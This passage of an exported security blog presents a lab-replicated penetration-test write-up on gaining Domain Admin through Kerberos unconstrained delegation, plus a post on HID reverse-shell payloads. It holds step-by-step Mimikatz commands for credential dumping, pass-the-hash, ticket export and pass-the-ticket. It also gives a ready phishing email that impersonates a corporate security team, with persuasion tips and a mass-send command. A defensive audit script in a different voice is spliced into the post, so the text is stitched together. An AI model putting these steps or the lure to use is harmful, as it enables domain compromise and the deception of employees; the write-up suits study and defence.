<a href="https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET#blocking-the-regsvr32-application-whitelisting-bypass-technique">https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET#blocking-the-regsvr32-application-whitelisting-bypass-technique</a><br />
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
</div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com4tag:blogger.com,1999:blog-8135211063584500909.post-72797016838983719912016-02-28T22:55:00.001+05:302018-01-14T22:48:15.104+05:30Getting Domain Admin with Kerberos Unconstrained Delegation<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
A recent penetration test was one of the rare ones where it was not possible to locate a domain admin credential (password/hash/ticket) using the usual methods. I already had Administrator access to one of the servers thanks to a file upload feature in an in-house log management dashboard running over WAMP (WAMP runs with SYSTEM privileges). I got access to a few more servers by using the hashes of a domain user who was local admin on a couple more servers, and some more similar stuff, but still no luck. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Anyway, after looking around for Active Directory and Kerberos related attacks for a while, it was time to reconsider the attack approach. Recall the first thing which comes to mind when we fail at server side attacks? Absolutely! Client side attacks. I could drop <a href="http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html">some emails with attachments and links</a> and hope to hit a user machine which leads me to a server holding a Domain Admin token. The client, for his own reasons, wanted me to keep all the connect back shells/requests from phishing within the internal network, and there was absolutely no outgoing traffic allowed towards my VPN machine. (Diagram built with <a href="http://draw.io/">draw.io</a>)</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx-LQmTnRwaFhdo_4o5qskiaMUZ6LCg7ND92i_MEjsVEGRm5Soq8wvBG1oJV4SoixkmCTlu3Ia2NHPKhyphenhyphenx2xNavPWgFKo9b3H3HhH01ss7ddPYlC-mDtbU9gBK7CeIMGHNYiq7g25TWS0/s1600/Kerberos+Unsonctrained+Delegation.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgx-LQmTnRwaFhdo_4o5qskiaMUZ6LCg7ND92i_MEjsVEGRm5Soq8wvBG1oJV4SoixkmCTlu3Ia2NHPKhyphenhyphenx2xNavPWgFKo9b3H3HhH01ss7ddPYlC-mDtbU9gBK7CeIMGHNYiq7g25TWS0/s400/Kerberos+Unsonctrained+Delegation.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
So, either I needed to set up multiple listeners on one of the compromised servers which could handle multiple connect back shells, or find some way to use an existing service as a listener for my phishing attacks. Since I am lazy :) I decided to go with the second option, that is, using an existing service. While enumerating the domain after the initial foothold, I saw that a web server had <a href="http://blogs.msdn.com/b/autz_auth_stuff/archive/2011/05/03/kerberos-delegation.aspx">Kerberos Unconstrained Delegation</a> enabled.</div>
<div style="text-align: justify;">
<br />
Once I realized Kerberos Unconstrained Delegation was enabled, I could attempt to exploit this scenario using a technique Sean Metcalf (<a href="https://twitter.com/PyroTek3">@PyroTek3</a>) spoke about last year and published on ADSecurity.org (<a href="https://adsecurity.org/?p=1667">https://adsecurity.org/?p=1667</a>). Sean covers how exploiting a server with Kerberos Unconstrained Delegation can lead to theft of DA credentials, and therefore Active Directory compromise, by tricking a Domain Admin into connecting to any Kerberos service on the server.<br />
<br />
So, all that needed to be done was to create phishing emails, use them to make users connect back to the server where I had admin access, and wait for a domain admin to fall for an email.<br />
<br />
Here is how I did it (replicated in my lab). </div>
<div style="text-align: justify;">
1. pfptlab-build is the server where we have admin access with RDP, PowerShell Remoting etc.<br />
2. pfptlab-web is the server where we can execute commands as admin but it is not directly accessible.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_SsNhfKpkQj9_Mms3wgxZaVhWbTBEjSMHmt4aByH-u1slYUhMkZqjQLoITLpcaN234vx4AqX9e17NUCJGAuCCjHOyQ5z1kWhxHNX8NYRMBXGxWB9HSszcK839_mSm5WBETEww3c_iahU/s1600/Kerberos+Unsonctrained+Delegation+Lab.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="337" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_SsNhfKpkQj9_Mms3wgxZaVhWbTBEjSMHmt4aByH-u1slYUhMkZqjQLoITLpcaN234vx4AqX9e17NUCJGAuCCjHOyQ5z1kWhxHNX8NYRMBXGxWB9HSszcK839_mSm5WBETEww3c_iahU/s400/Kerberos+Unsonctrained+Delegation+Lab.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<h4>
Searching for computers with Unconstrained Delegation</h4>
One way is to use the built-in Active Directory PowerShell module, which is available by default on Windows Server 2012. From an elevated shell on the server with admin access (pfptlab-build) use the commands below:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Add-WindowsFeature RSAT-AD-PowerShell
PS C:\> Import-Module ActiveDirectory
PS C:\> Get-ADComputer -Filter {(TrustedForDelegation -eq $True) -and (PrimaryGroupID -eq 515)}
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_UJQCWboj4YMZYBJzqiT_GBX62WtWi1B1WCTY7DYLjXsRavPWqt8aJxCzl4D8W_kge_c5AXlQx92ShzAJZTvfza1i3YHTwPxB5yqxirpjz_uR-WUkkreNT0ktYYlY9ixH8LdQT5Gm_4c/s1600/Search.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_UJQCWboj4YMZYBJzqiT_GBX62WtWi1B1WCTY7DYLjXsRavPWqt8aJxCzl4D8W_kge_c5AXlQx92ShzAJZTvfza1i3YHTwPxB5yqxirpjz_uR-WUkkreNT0ktYYlY9ixH8LdQT5Gm_4c/s400/Search.png" width="400" /></a></div>
I have wrapped the above commands in a script, Get-Unconstrained.ps1, found in the <a href="https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Get-Unconstrained.ps1">ActiveDirectory category of Nishang.</a><br />
<br />
Another way of searching for computers with Unconstrained Delegation is using PowerView:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Get-NetComputer -Unconstrained
</textarea></pre>
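The same search written as an audit script, added here and not taken from the post or from Nishang: it finds the hosts via the TRUSTED_FOR_DELEGATION bit (0x80000) of userAccountControl with an LDAP matching-rule filter, drops domain controllers by their PrimaryGroupID (516; the 515 in the filter above is Domain Computers), and goes one step beyond the post by listing privileged accounts that are still allowed to be delegated, i.e. those without the "Account is sensitive and cannot be delegated" flag (NOT_DELEGATED, 0x100000) and outside the Protected Users group. Those two controls are what keep a Domain Admin's TGT from being cached on a host like pfptlab-web. The bit values and group names are Microsoft's documented defaults; the function names are mine.<br />

```powershell
# Added example, not part of the original post or Nishang.
# Requires the ActiveDirectory module (Add-WindowsFeature RSAT-AD-PowerShell on a server).
Import-Module ActiveDirectory

# userAccountControl bits as documented by Microsoft
$TRUSTED_FOR_DELEGATION = 0x80000   # 524288  - unconstrained delegation
$NOT_DELEGATED          = 0x100000  # 1048576 - "Account is sensitive and cannot be delegated"
$DOMAIN_CONTROLLERS_RID = 516       # PrimaryGroupID of domain controllers (515 = Domain Computers)

function Get-UnconstrainedDelegationHost {
    # Same result as the Get-ADComputer -Filter above, expressed as an LDAP bitwise-AND
    # filter on userAccountControl so it also works against another domain via -Server.
    [CmdletBinding()]
    param([string]$Server)
    $p = @{
        LDAPFilter = "(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_FOR_DELEGATION)"
        Properties = 'PrimaryGroupID', 'OperatingSystem', 'LastLogonDate'
    }
    if ($Server) { $p.Server = $Server }

    # Domain controllers are trusted for delegation by design, so leave them out
    Get-ADComputer @p |
        Where-Object { $_.PrimaryGroupID -ne $DOMAIN_CONTROLLERS_RID } |
        Select-Object Name, DNSHostName, OperatingSystem, LastLogonDate
}

function Get-DelegatablePrivilegedUser {
    # Privileged users whose TGT would land in LSASS of a host above if they connected to it:
    # anyone without NOT_DELEGATED who is also not a member of Protected Users.
    [CmdletBinding()]
    param([string[]]$Group = @('Domain Admins', 'Enterprise Admins', 'Administrators'))

    $protected = @()
    try {
        # Protected Users exists from the Windows Server 2012 R2 domain functional level onwards
        $protected = Get-ADGroupMember -Identity 'Protected Users' -Recursive -ErrorAction Stop |
            Select-Object -ExpandProperty DistinguishedName
    } catch { Write-Verbose 'Protected Users group not found in this domain' }

    $Group | ForEach-Object { Get-ADGroupMember -Identity $_ -Recursive } |
        Where-Object { $_.objectClass -eq 'user' } |
        Sort-Object -Property DistinguishedName -Unique |
        ForEach-Object {
            $u = Get-ADUser -Identity $_.DistinguishedName -Properties userAccountControl
            [pscustomobject]@{
                SamAccountName   = $u.SamAccountName
                NotDelegated     = [bool]($u.userAccountControl -band $NOT_DELEGATED)
                InProtectedUsers = ($protected -contains $u.DistinguishedName)
            }
        } |
        Where-Object { -not $_.NotDelegated -and -not $_.InProtectedUsers }
}

Get-UnconstrainedDelegationHost | Format-Table -AutoSize
Get-DelegatablePrivilegedUser   | Format-Table -AutoSize
```

An empty result from the second function means no account in those groups can have its TGT forwarded to a server like pfptlab-web, which removes the condition the rest of this post depends on; a non-empty one is the remediation list.<br />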
<h4>
Setting up the "Listener"</h4>
</div>
<div style="text-align: justify;">
On the server where unconstrained delegation is enabled (pfptlab-web in the lab), we can enumerate existing tickets using Invoke-Mimikatz. Keep in mind that we have admin access to the server with the help of the hash of a domain user who is local admin on that server. Please note that we can pass the ticket as well, but the expiry time of the ticket will play spoilsport here, as we need to wait till a domain admin connects to the machine.<br />
<br />
We can use the hash of the domain user webadmin, which is a local admin on pfptlab-web, the server with unconstrained delegation:</div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Invoke-Mimikatz -DumpCreds
PS C:\> Invoke-Mimikatz -Command '"sekurlsa::pth /user:webadmin /domain:pfptlab /ntlm:[ntlm hash] /run:powershell.exe"'
</textarea></pre>
This is what the output of these commands looks like: <br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjElK8wDO-Mf8JGTX7yMrXByziCZRJjRopqrcM9qdqQ3mmf5a-N6_4cRlUXWI-_vubjx4ne73GqJqizkNXx7KPRiBqWRkts-jR_2P4HFY3CT-VXdwPsvbEE5oGNDkjZs___jo2SfByiHSg/s1600/webadmin_hashes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjElK8wDO-Mf8JGTX7yMrXByziCZRJjRopqrcM9qdqQ3mmf5a-N6_4cRlUXWI-_vubjx4ne73GqJqizkNXx7KPRiBqWRkts-jR_2P4HFY3CT-VXdwPsvbEE5oGNDkjZs___jo2SfByiHSg/s400/webadmin_hashes.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlmTGZor5NtHbK-TL4X5ALgm-hTmK6oXqDsqFiPiW3Pa0dvvq6eNtzZCBAAM7eK7gBsRHcxJGDdyTSnwMqu5qojpOoHfkXN4qquxy2HNAs3WBLAQ3wKD92g8VWsIrr80oEnms-iAeJnaM/s1600/webadmni_PSSession.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlmTGZor5NtHbK-TL4X5ALgm-hTmK6oXqDsqFiPiW3Pa0dvvq6eNtzZCBAAM7eK7gBsRHcxJGDdyTSnwMqu5qojpOoHfkXN4qquxy2HNAs3WBLAQ3wKD92g8VWsIrr80oEnms-iAeJnaM/s400/webadmni_PSSession.png" width="400" /></a></div>
Now, let's list tickets on pfptlab-web, the server with Unconstrained Delegation. Since we have direct access to the pfptlab-build machine, let's *drop the script on disk* there and use the commands below to run it in a stateful session on pfptlab-web without touching its disk. Remember that the commands below need to be run in the PowerShell console opened by over-passing the hash of the webadmin user:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> $sess = New-PSSession -ComputerName pfptlab-web
PS C:\> Invoke-Command -FilePath C:\Users\buildadmin\Desktop\Invoke-Mimikatz.ps1 -Session $sess
PS C:\> Invoke-Command -ScriptBlock {cd $env:TEMP} -Session $sess
PS C:\> Invoke-Command -ScriptBlock {Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'} -Session $sess
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh57yLWn5GxAHZgAK4TNpR1mRVB1cqLzovA2a2l-8TkgdBpSgLI9LonQVYxh6a7iq32jmCm3losy9YgffgzDR8DAHuoiNeADFRi7NYnGaEEA-hDc2z2KKeYYb7aotqh3vzTvvl2aBlRMcw/s1600/tcikets_webadmin.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh57yLWn5GxAHZgAK4TNpR1mRVB1cqLzovA2a2l-8TkgdBpSgLI9LonQVYxh6a7iq32jmCm3losy9YgffgzDR8DAHuoiNeADFRi7NYnGaEEA-hDc2z2KKeYYb7aotqh3vzTvvl2aBlRMcw/s400/tcikets_webadmin.png" width="400" /></a></div>
<br />
<i>An alternate way with a catch!</i><br />
A quick thing to note here. If we try to use the command below (to execute Invoke-Mimikatz on pfptlab-web without dropping the script to disk on pfptlab-build) there will be an error.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -ArgumentList '-Command "sekurlsa::tickets"' -ComputerName pfptlab-web
</textarea></pre>
Because we cannot pass named parameters through the -ArgumentList parameter. It is not possible to pass "-Command '"sekurlsa::tickets"'" in the above case; we can pass only positional parameters. To overcome this I changed the positions of the parameters: I assigned position 0 to the "Command" parameter of Invoke-Mimikatz and the above command worked successfully. Now the catch! If I add "/export" to the ArgumentList parameter in the above command, it fails, as PowerShell passes it to Invoke-Mimikatz as a second parameter. If anyone is able to do that successfully, please share!<br />
<br />
So, assuming that we have already enumerated the Domain Administrator accounts and one of them is "Administrator", we can use the following ugly method to know whether a domain admin has connected:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> $output = Invoke-Command -ScriptBlock {(ls $env:temp\*.kirbi).name} -Session $sess
PS C:\> $output | sls Administrator
</textarea></pre>
Maybe someone will automate this in a much cleaner way. If a ticket of the Domain Administrator, Administrator, is saved by Mimikatz, the second command above should list it. But there is no Domain Admin ticket on pfptlab-web yet.<br />
<h4>
Preparing email</h4>
</div>
<div style="text-align: justify;">
Fortunately, the client's internal mail server allowed email relaying, so sending phishing emails was not a problem. I was able to get access to email IDs with a combination of AD usernames and a couple of Excel files with email addresses I got my hands on. After sharing the emails with the client, he removed the emails of some guys from the management. One of the multiple email templates used was: <br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: white; color: black;">Hey,
I am from the Corporate Security Team, we look after security here. We have detected multiple anomalies in the network which could be traced back to your system. It could be a virus or a trojan attack which blocks you from accessing company resources. You are required to immediately perform all of the below steps:
1. Click on Start Menu -> Type cmd.exe
2. In the Window which opens up. type "reg query HKLM\SOFTWARE\Microsoft\"
3. Copy the contents of above command in a text file.
4. Go to \\[name of server with unconstrained delegation]\C$ and copy the file there.
5. If you are unable to access the share, just save the text file with the name Sotware_log.txt on your Desktop and we will pick it up.
Cheers,
Corporate Security Team
</textarea></pre>
While I am no expert in crafting phishing emails, I would like you to note some points in the above email:<br />
- No intimidation, but a balanced tone of authority.<br />
- Use of jargon but no overly obscure words, as if I were really trying to explain complex things in simple terms to the user. <br />
- Requirement of urgent action by the target user.<br />
- A command which displays a lot of output.<br />
- Providing an alternate way for the user if they can't access the share, which makes me look more helpful.<br />
Though I tried to pick up the "email culture" of the client from the emails I exchanged, surely this email could have been written a lot better. <br />
<br />
The email was sent to the users using the command below.<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">PS C:\> Send-MailMessage -From "Corporate Security<corporate.security@client.com>" -To $recipients -Subject "Security Anomaly: Action Required" -Body (Get-Content C:\Users\buildadmin\Desktop\email.txt | Out-String) -SmtpServer [IP of internal mail server]
</textarea></pre>
This is how the email looked in the mailbox of one of the targets.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMchUz1poPq-Se-gxdIcm36s-9Vi49m8MdRcKrBFlh2CSkGb9FwoOcL_Gyr7oTZJ1asZXiPDjs9uGmD1U-gaAbdf2WuIsfItQeHXW94jWUp9fsBxxBT_B9u3dZKsWXlOTvAucWuVSrBSw/s1600/email.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="115" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMchUz1poPq-Se-gxdIcm36s-9Vi49m8MdRcKrBFlh2CSkGb9FwoOcL_Gyr7oTZJ1asZXiPDjs9uGmD1U-gaAbdf2WuIsfItQeHXW94jWUp9fsBxxBT_B9u3dZKsWXlOTvAucWuVSrBSw/s400/email.png" width="400" /></a></div>
<br />
<h4>
Execution</h4>
</div>
<div style="text-align: justify;">
After sending the email, I started checking the tickets for Domain Administrators by running Invoke-Mimikatz repeatedly, and soon more than one domain administrator had complied with whatever they were asked to do :D<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUzelcdocJSfZehqS71YgQE_hXahKGv6Z01V0jttKosxZEq6zYe0bnXpDkBCt_YqDmj1wIoyiRtqzOzCS7CSHGjGYQxUjGQbXRijmFcOlz2BnuV1zds0XNcvR-Flyx-2aroCvhsQy-N2M/s1600/DA_Ticket_Found.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="57" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUzelcdocJSfZehqS71YgQE_hXahKGv6Z01V0jttKosxZEq6zYe0bnXpDkBCt_YqDmj1wIoyiRtqzOzCS7CSHGjGYQxUjGQbXRijmFcOlz2BnuV1zds0XNcvR-Flyx-2aroCvhsQy-N2M/s400/DA_Ticket_Found.png" width="400" /></a></div>
Now, in my opinion, the best way to use the tickets is to copy them to the pfptlab-build server as we have direct connectivity to it. Using the command below we can copy all the tickets from the pfptlab-web machine to the pfptlab-build machine.<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Copy-Item \\pfptlab-web\C$\Users\WEBADM~1.PFP\AppData\Local\Temp\*.kirbi C:\tickets
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvJM6EVIXCWrYrp6TUGRlJyW4u1ksQ-pQl5IgQzwhd1-mBj7MN227hYnqG03kdYz_Dc2SdaUdGPPfSjgvuL0Yv8NjIMyoA3n6Cu9gIwfQPa5FY0i0mLiPKpXi67VikqGyFPS9DPwif3C0/s1600/copy_tokens.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="28" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvJM6EVIXCWrYrp6TUGRlJyW4u1ksQ-pQl5IgQzwhd1-mBj7MN227hYnqG03kdYz_Dc2SdaUdGPPfSjgvuL0Yv8NjIMyoA3n6Cu9gIwfQPa5FY0i0mLiPKpXi67VikqGyFPS9DPwif3C0/s400/copy_tokens.png" width="400" /></a></div>
Now, we can use one of the administrators' tickets copied locally to elevate our privileges to Domain Administrator:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">PS C:\> Invoke-Mimikatz -Command '"kerberos::ptt [Ticket]"'
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiySFVwI9_YNZ7rRvPHi6_NRa6LIVH0CRWjeKEQeyi3OFu7Bt1EgFjzLF3Jd65s-LrFqbfp5-Rwbci3YmThcoBJnlUea1llN5xAU53-HbXaq1oK0UOsjs_egnFpFizXv1wZ9MEwiwR6_kM/s1600/DA_Privilege.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiySFVwI9_YNZ7rRvPHi6_NRa6LIVH0CRWjeKEQeyi3OFu7Bt1EgFjzLF3Jd65s-LrFqbfp5-Rwbci3YmThcoBJnlUea1llN5xAU53-HbXaq1oK0UOsjs_egnFpFizXv1wZ9MEwiwR6_kM/s400/DA_Privilege.png" width="400" /></a></div>
Awesome! Finally Domain Admin access. Let the victory dance begin :D :D<br />
<br />
Here is a quick video to demonstrate the attack:<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/s_vi/waukDKApzHo/default.jpg?sqp=CLzRzLYF&rs=AOn4CLB_Bi0jLIV2fk7e7L-Q1xXaTjeEgA" frameborder="0" height="266" src="https://www.youtube.com/embed/waukDKApzHo?feature=player_embedded" width="320"></iframe></div>
<br />
<br />
After getting the DA access, I gathered some business related data to demonstrate actual impact to the client management. <br />
<br />
Please leave feedback and comments. <br />
<br /></div>
<div style="text-align: justify;">
<div style="text-align: left;">
Learn penetration testing of a highly secure, live Windows network with me in <b>PowerShell for Penetration Testers Training</b> at:</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>CanSecWest, Vancouver (4 days - March 12-15th, 2016)</b> - <a href="https://cansecwest.com/dojos/2016/powershell.html">https://cansecwest.com/dojos/2016/powershell.html</a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<b>Brucon, Gent, Belgium (3 days - April 20-22nd, 2016) - </b><a href="http://2016.brucon.org/index.php/Spring_Training_2016_-_PowerShell_for_Penetration_Testers">http://2016.brucon.org/index.php/Spring_Training_2016_-_PowerShell_for_Penetration_Testers</a></div>
<div style="text-align: left;">
<b><br />
</b></div>
<div style="text-align: left;">
<b>HITB, Amsterdam (2 days - May 24-25th, 2016) - </b><a href="http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/">http://conference.hitb.org/hitbsecconf2016ams/sessions/2-day-training-3-powershell-for-penetration-testers/</a><b><br />
</b></div>
<br />
<br />
<br /></div>
</div>
Nikhil SamratAshok Mittal (http://www.blogger.com/profile/02092541175521734123)<br />
<br />
Hacking with Human Interface Devices - Easy Reverse Shells (published 2016-02-11, updated 2018-01-14)<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<br />
Kautilya has the ability to do <a href="http://www.labofapenetrationtester.com/2014/07/kautilya-050.html">interesting</a> and <a href="http://www.labofapenetrationtester.com/2015/01/dropping-weaponized-files-using-hid.html">useful</a> stuff using a Human Interface Device. But sometimes, nothing beats a simple reverse shell. Recently, I added some new payloads to Kautilya which are useful for getting reverse shells using different protocols.<br />
<br />
This post describes the payloads which give us the capability of having reverse connect PowerShell shells from Windows targets. With these payloads, Kautilya now has an improved capability to provide us with a foothold machine in penetration testing engagements where the use of Social Engineering techniques is allowed. For those who follow my other tool Nishang, I did a <a href="http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html">five-part blog series on that</a>.</div>
<div style="text-align: justify;">
<br />
<br />
Let's see the payloads in action.<br />
<br />
<h4>
Reverse TCP and Reverse UDP</h4>
Both payloads can be used with a standard netcat listener on Windows and Linux. On Windows, <a href="https://github.com/besimorhino/powercat">Powercat </a>can also be used. We just need to provide the IP to which the target connects back and the port to use. Upload it to a HID and send it to a target.<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfHjuf0evT_P2n3qHYWNLOajLMMV9eG_ARUfPVNwBj2P65zyeK5TPJP9SACYJgT5z6UADTvyrn17HgQOnnJHE0T9f5IAroCxs967gpunTPnvCyIN3rlejQ9Ark_2qEuDyQ1PExC4akWzY/s1600/UDP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfHjuf0evT_P2n3qHYWNLOajLMMV9eG_ARUfPVNwBj2P65zyeK5TPJP9SACYJgT5z6UADTvyrn17HgQOnnJHE0T9f5IAroCxs967gpunTPnvCyIN3rlejQ9Ark_2qEuDyQ1PExC4akWzY/s400/UDP.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
When a target connects the device, this is how it looks at the listener. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQfjEY4xMMy67g74WbS8jTGI8KJP92Lp0M9Gk8E07LU_WBta8t2lM5nYP7AOcNyiLKB6hLlGbvyku0uwuPQHmikNBlqVWwXTEqJJBnjr4XFDvgUTkSYqarqsLEZKEV1JTyyYC83_afiVs/s1600/UDP_Reverse.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQfjEY4xMMy67g74WbS8jTGI8KJP92Lp0M9Gk8E07LU_WBta8t2lM5nYP7AOcNyiLKB6hLlGbvyku0uwuPQHmikNBlqVWwXTEqJJBnjr4XFDvgUTkSYqarqsLEZKEV1JTyyYC83_afiVs/s400/UDP_Reverse.png" width="400" /></a></div>
Neat! An interactive reverse PowerShell shell.<br />
<br />
<h4>
Reverse ICMP</h4>
<br />
My favorite one for bypassing network restrictions: a reverse shell completely over ICMP. This payload needs a listener, icmpsh_m.py, from the <a href="https://github.com/inquisb/icmpsh">icmpsh suite</a>. Run the command "sysctl -w net.ipv4.icmp_echo_ignore_all=1" (so that the kernel does not answer the echo requests itself) and start the listener. This is how it looks on a successful connection:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLRCfSnsf_YIMQOsE_2kTKR658_U6zXIFUSucqojdT32ef_md-EVXdJaPWC-QEVI6uNoJqQEcoej4hjLEBUB1kiyv7aSqhPtcw_-pkJd3FTMeW_86XvL_2DTsZwUgloKfxRsZjJcYQmO4/s1600/ICMP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="158" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLRCfSnsf_YIMQOsE_2kTKR658_U6zXIFUSucqojdT32ef_md-EVXdJaPWC-QEVI6uNoJqQEcoej4hjLEBUB1kiyv7aSqhPtcw_-pkJd3FTMeW_86XvL_2DTsZwUgloKfxRsZjJcYQmO4/s400/ICMP.png" width="400" /></a></div>
This one has been useful in so many penetration tests.<br />
<br />
<h4>
Reverse HTTPS and Reverse HTTP</h4>
Reverse HTTPS is proxy aware and uses valid HTTPS traffic for the reverse PowerShell shell. Its target part (the typing done on the target machine) is very small, which makes it very useful. Currently, a listener on Windows is required. Run Invoke-PoshRatHttps.ps1 from the extras directory of Kautilya in an elevated shell. The listener script adds an exception to the Windows Firewall for incoming requests on the specified port.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOc-uqXoVMeBIus4r-n-cWtyG2tCBXbplyLhnU_9kWcKl5s7nL4lftxtXnwsglS1_3YYtcGUB0bg4cJXCsoMwOP9Hx7TsjiTPrT3iwR8o8XsP7uc3DwVHvWxkyo5gJgHj9yMvA2L4deqc/s1600/HTTPS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOc-uqXoVMeBIus4r-n-cWtyG2tCBXbplyLhnU_9kWcKl5s7nL4lftxtXnwsglS1_3YYtcGUB0bg4cJXCsoMwOP9Hx7TsjiTPrT3iwR8o8XsP7uc3DwVHvWxkyo5gJgHj9yMvA2L4deqc/s400/HTTPS.png" width="400" /></a></div>
<br />
Awesome, isn't it? <br />
<br />
Hope you liked the post! As always, I look forward to feedback and comments.<br />
<br />
</div>
</div>
<br /></div>
Nikhil SamratAshok Mittal (http://www.blogger.com/profile/02092541175521734123)<br />
<br />
Stream a target's Desktop using MJPEG and PowerShell (published 2015-12-17, updated 2018-01-14)<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
</div>
